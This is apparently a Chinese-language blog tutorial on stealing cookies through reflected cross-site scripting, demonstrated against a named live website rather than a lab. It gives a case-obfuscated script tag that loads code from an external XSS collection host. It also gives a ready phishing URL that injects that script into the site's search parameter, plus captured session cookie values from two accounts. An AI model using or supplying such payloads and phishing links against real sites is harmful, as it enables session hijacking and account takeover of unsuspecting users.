危害:获取Cookie

开始学习反射型XSS时不知道有什么危害,弹个1没啥用,于是我们利用经典的<script>alert(document.cookie)</script>展开攻击

经过这波操作,我们获得了 敏感信息PHPSESSID=94a7gvd2icb3hva0u255jjadl0

反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie

打Cookie实战

目标:云图AI开放平台

来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie
发现一个搜索框,测试可以弹,证明这个网站存在XSS

此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台
XSS平台-XSS安全测试平台
在这个平台创建一个项目,选择无keepsession

查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接

恶意JS:<sCRiPt sRC=//xss.yt/WnT3></sCrIpT>

钓鱼链接:

1
https://moomoopark.com/index.php?pro_keyword=%3CsCRiPt%20sRC=//xss.yt/WnT3%3E%3C/sCrIpT%3E&c=search&m=index

zyh666访问钓鱼链接,测试可以收到cookie
其中PHPSESSID=k5ckg7164sldfd8dm4phom2qq5


接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!
其中PHPSESSID=3c4161sbsijrqoq8pjmhquus37


实战打Cookie成功